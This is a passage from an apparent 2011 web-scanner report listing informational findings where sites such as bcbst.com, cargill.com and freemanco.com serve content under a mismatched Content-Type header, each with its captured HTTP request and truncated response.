Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /css/favicon.ico HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:21 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 04 Jul 2007 12:41:24 GMT
ETag: "65d28af-47e-61394500"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

29.53. http://www.aptm.phoenix.edu/AptiNet/DynamicSelect  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/DynamicSelect

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

POST /AptiNet/DynamicSelect HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/hhs
Origin: http://www.aptm.phoenix.edu
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; country=US; postal_code=5672; linkplidlist=47054%2C14771; state=-X-; plid=47054%7C14771; vid=51922095; aptmimpressions=34847_0608_909_11%7C36214_7718_98_95%7C24514_7719_10_94; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.5.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845605391
Content-Length: 180

MULTIPAGEFORMAT=Y&poid=36214_7718_98_95&dfn=preferredphonetype%7C36214_7718_98_95%7C143196%7CREQUIRED&dfv=143196|home&drivenattrtype=attrtattr&page=returnquestions&output=text/html

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Content-Length: 118
Content-Type: text/html; charset=UTF-8

<tr><td><div class="QUESTIONS"><table border="0" cellpadding="1" cellspacing="0" align="left"></table></div></td></tr>

29.54. http://www.bcbst.com/billboard/mobile.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bcbst.com
Path:   /billboard/mobile.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /billboard/mobile.jpg HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
Referer: http://www.bcbst.com/billboard/billboard.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849513702:ss=1303849513702

Response

HTTP/1.1 200 OK
Content-Length: 22016
Content-Type: image/jpeg
Last-Modified: Fri, 14 Jan 2011 14:47:22 GMT
Accept-Ranges: bytes
ETag: "0f947f3f9b3cb1:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:37:50 GMT

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

..................................................................
...[SNIP]...

29.55. https://www.bcbst.com/accounttools/public/0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.bcbst.com
Path:   /accounttools/public/0

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /accounttools/public/0 HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
Referer: https://www.bcbst.com/accounttools/public/askUserId.do?usage=forgot
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 20:25:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
$WSEP:
Content-Language: en-US
Cteonnt-Length: 48
Server: WebSphere Application Server/6.1
Cache-Control: private
Content-Length: 48

Error 404: SRVE0190E: File not found: /public/0

29.56. http://www.bing.com/sck  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /sck

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /sck?cn=_SS&r=http://www.msn.com/sck.aspx&h=36aef2a7-994a-6863-3092-2a28e086b0e4 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:35:44 GMT
Connection: close
Set-Cookie: _SS=SID=BADDC820B268422C99FA89F5582D20C7; domain=.bing.com; path=/

<iframe src="http://www.msn.com/sck.aspx?cv=_SS%3dSID%3dBADDC820B268422C99FA89F5582D20C7%3b&h=36aef2a7-994a-6863-3092-2a28e086b0e4" height="0" width="0" frameborder="0"/>

29.57. http://www.cargill.com/wcm/fragments/ccom_home_flash_static_list/slideshow.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargill.com
Path:   /wcm/fragments/ccom_home_flash_static_list/slideshow.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /wcm/fragments/ccom_home_flash_static_list/slideshow.swf HTTP/1.1
Host: www.cargill.com
Proxy-Connection: keep-alive
Referer: http://www.cargill.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ysx-ZD0yWuxrqGU4fi3SV6q:-1; __utma=181704245.538130907.1303847440.1303847440.1303847440.1; __utmb=181704245; __utmc=181704245; __utmz=181704245.1303847440.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:50:34 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 25 Jan 2011 19:58:33 GMT
Content-Length: 29668
Content-Type: text/plain
Content-Language: en-US

CWS.E...x...y<......d8(....9.$J..y..9...."!C.{.%!eh.$.s..d..A.JEi..,.M.A........y|>........Vk....k...u^.@f...#@..Nr..8........D...M.a...@...$=......>.....E&dd.UL......{.............'P......%.C...Ve.m
...[SNIP]...

29.58. http://www.cargill.com/wcm/fragments/ccom_landing_flash_static_list/slideshow_650x292.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargill.com
Path:   /wcm/fragments/ccom_landing_flash_static_list/slideshow_650x292.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /wcm/fragments/ccom_landing_flash_static_list/slideshow_650x292.swf HTTP/1.1
Host: www.cargill.com
Proxy-Connection: keep-alive
Referer: http://www.cargill.com/careers/index.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ysx-ZD0yWuxrqGU4fi3SV6q:-1; __utma=181704245.538130907.1303847440.1303847440.1303847440.1; __utmc=181704245; __utmz=181704245.1303847440.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=181704245

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:50:51 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 25 Jan 2011 20:03:46 GMT
Content-Length: 29548
Content-Type: text/plain
Content-Language: en-US

CWS.....x...y<......d8(....9.$J..).8.1....    ..........(.A(....E*..AW..6....._.......<....zxZ....k.=...yI.. ....M
8....H...?....I..7A.I...Y....(.Z.......SR....Q...    }.6...    &"..../W...5O....}..K..<.c....
...[SNIP]...

29.59. http://www.cargill.com/wcm/groups/public/@ss-assets/documents/script/ccom_home_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3025330-pmr-pageLevel-val-1.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargill.com
Path:   /wcm/groups/public/@ss-assets/documents/script/ccom_home_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3025330-pmr-pageLevel-val-1.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /wcm/groups/public/@ss-assets/documents/script/ccom_home_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3025330-pmr-pageLevel-val-1.jsp HTTP/1.1
Host: www.cargill.com
Proxy-Connection: keep-alive
Referer: http://www.cargill.com/wcm/fragments/ccom_home_flash_static_list/slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ysx-ZD0yWuxrqGU4fi3SV6q:-1; __utma=181704245.538130907.1303847440.1303847440.1303847440.1; __utmb=181704245; __utmc=181704245; __utmz=181704245.1303847440.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:50:36 GMT
Server: IBM_HTTP_Server
Content-Length: 4449
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<?xml version="1.0" encoding="utf-8" ?>


<flashModule>
   

<settings><imageTransitionTime>15</imageTransitionTime> <!-- number / 30 second -->
<imageTransitionTimeSlide>15</imageTra
...[SNIP]...

29.60. http://www.cargill.com/wcm/groups/public/@ss-assets/documents/script/ccom_landing_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3018658-pmr-pageLevel-val-2.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cargill.com
Path:   /wcm/groups/public/@ss-assets/documents/script/ccom_landing_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3018658-pmr-pageLevel-val-2.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /wcm/groups/public/@ss-assets/documents/script/ccom_landing_flash_param_gen_params_NextRowSS_DATAFILE-val-NA3018658-pmr-pageLevel-val-2.jsp HTTP/1.1
Host: www.cargill.com
Proxy-Connection: keep-alive
Referer: http://www.cargill.com/wcm/fragments/ccom_landing_flash_static_list/slideshow_650x292.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ysx-ZD0yWuxrqGU4fi3SV6q:-1; __utma=181704245.538130907.1303847440.1303847440.1303847440.1; __utmc=181704245; __utmz=181704245.1303847440.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=181704245

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:50:52 GMT
Server: IBM_HTTP_Server
Content-Length: 3069
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<?xml version="1.0" encoding="utf-8" ?>


<flashModule>
   

<settings><imageTransitionTime>15</imageTransitionTime> <!-- number / 30 second --><imageTransitionTimeSlide>30</imageTrans
...[SNIP]...

29.61. http://www.freemanco.com/store/global/util/stateRestriction.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freemanco.com
Path:   /store/global/util/stateRestriction.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /store/global/util/stateRestriction.jsp?countryCode=USA HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/store/user/forgetUserName.jsp
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/plain, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; __utmz=95684043.1303850323.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=95684043.1984575328.1303848339.1303848339.1303850323.2; __utmc=95684043; __utmb=95684043.3.10.1303850323

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:39:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 5865


                                                           {



...[SNIP]...

29.62. http://www.freemanco.com/store/includes/ajax/loginOrNot.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freemanco.com
Path:   /store/includes/ajax/loginOrNot.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /store/includes/ajax/loginOrNot.jsp HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.1.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:05:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 137


                                                                                                    notLogin
           
           
       

29.63. https://www.freemanco.com/store/checkout/includes/stateRestriction.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.freemanco.com
Path:   /store/checkout/includes/stateRestriction.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /store/checkout/includes/stateRestriction.jsp?countryCode=USA HTTP/1.1
Host: www.freemanco.com
Connection: keep-alive
Referer: https://www.freemanco.com/store/index.jsp?_requestid=131058
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/plain, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmc=95684043; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 10901


                                                           {
               
                   
                                                                                                                                                                               
...[SNIP]...

29.64. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
Content-Length: 5561

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:04 GMT
Content-Length: 5714

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.9348020141478628<&>0ctl01$Banner$UserS
...[SNIP]...

29.65. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Azia HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:11:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 44055

f94-wCe9....S....o...'..a..........c..v<!doctype html> <head> <title>Azia - Google Search</title> <script>window.google={kEI:"8TS3Tau4J9GWtwfAh_h9",kEXPI:"17259,24472,25907,27147,28514,28766,2888
...[SNIP]...

29.66. http://www.itasoftware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.itasoftware.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.itasoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.9.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:56:09 GMT
Server: Apache
Last-Modified: Tue, 15 Dec 2009 19:18:37 GMT
Accept-Ranges: bytes
Content-Length: 1150
Expires: Wed, 15 Apr 2020 20:00:00 GMT
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................................n...H...I...g.......f...................................q.......;...........q...........................................
...[SNIP]...

29.67. http://www.itasoftware.com/scripts/highslide/graphics/zoomout.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.itasoftware.com
Path:   /scripts/highslide/graphics/zoomout.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /scripts/highslide/graphics/zoomout.cur HTTP/1.1
Host: www.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://www.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.9.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:56:18 GMT
Server: Apache
Last-Modified: Wed, 15 Feb 2006 19:00:50 GMT
Accept-Ranges: bytes
Content-Length: 326
Content-Type: text/plain; charset=UTF-8

...... ......0.......(... ...@.............................................................................................p............... ...@.............7...$    ..$    ..7.............................
...[SNIP]...

29.68. http://www.omniture.com/listener.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.omniture.com
Path:   /listener.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /listener.html?action=isol_views&type=ab_zone&creatives=652,289,690,492, HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; mbox=PC#1303601743323-887111.17#1306269330|check#true#1303850212|session#1303850129880-628856#1303851990; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 00:59:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 07 Feb 2011 22:46:27 GMT
xserver: www5.dmz
Content-Length: 73
Content-Type: text/html; charset=utf-8
Date: Tue, 26 Apr 2011 20:59:09 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?><response status="true"></response>

29.69. http://www.omniture.com/modules/creative_zones/display.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
